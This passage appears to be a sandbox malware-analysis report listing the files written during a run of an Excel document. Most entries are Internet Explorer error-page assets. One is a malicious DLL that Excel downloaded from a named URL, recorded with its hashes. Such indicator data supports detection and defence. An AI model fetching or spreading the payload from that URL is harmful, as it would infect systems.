                                                                                                                                                                            Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bullet[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):447
                                                                                                                                                                            Entropy (8bit):7.304718288205936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                            MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                            SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                            SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                            SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\httpErrorPagesScripts[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http_404[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):6495
                                                                                                                                                                            Entropy (8bit):3.8998802417135856
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                            MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                            SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                            SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                            SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                                                            Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\info_48[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4113
                                                                                                                                                                            Entropy (8bit):7.9370830126943375
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                            MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                            SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                            SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                            SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):312832
                                                                                                                                                                            Entropy (8bit):6.133421258123313
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:92dsJtFrYUZZqrS6HtYP612U8ZIbBmWMOzWb/0:9SsJtFrYJS6NYy123IMWLz5
                                                                                                                                                                            MD5:5A7C87DAB250CEE78CE63AC34117012B
                                                                                                                                                                            SHA1:554C4CCF2341182768D475087D8A8BCFAA525A12
                                                                                                                                                                            SHA-256:8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
                                                                                                                                                                            SHA-512:3B4BD7963E3C397618562708064674BD2418F5CAB71CE861986EFA3BCD14FA6B0155DAECE10B9A7AD3FE0F7FAC6FDFD693B4AC2451F4EAABB30BA8253286B7ED
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: 4Y2I7k0.xlsb, Detection: malicious, Browse
                                                                                                                                                                            IE Cache URL:http://docs.atu.ngr.mybluehost.me/presentation.dll
                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................................................................Rich...........PE..L....Hn`...........!.................;.......................................P............@.........................`...T.......<.... .......................0..........................................@............................................text............................... ..`.data...Hq..........................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ErrorPageTemplate[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2168
                                                                                                                                                                            Entropy (8bit):5.207912016937144
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                            MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                            SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                            SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                            SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\background_gradient[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):5.019973044227213
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                            MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                            SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                            SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                            SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                                                            Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\bullet[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):447
                                                                                                                                                                            Entropy (8bit):7.304718288205936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                            MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                            SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                            SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                            SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\down[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):748
                                                                                                                                                                            Entropy (8bit):7.249606135668305
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                            MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4720
                                                                                                                                                                            Entropy (8bit):5.164796203267696
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\httpErrorPagesScripts[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\background_gradient[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):5.019973044227213
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                            MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                            SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                            SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                            SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\down[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):748
                                                                                                                                                                            Entropy (8bit):7.249606135668305
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                            MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\errorPageStrings[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4720
                                                                                                                                                                            Entropy (8bit):5.164796203267696
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\info_48[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
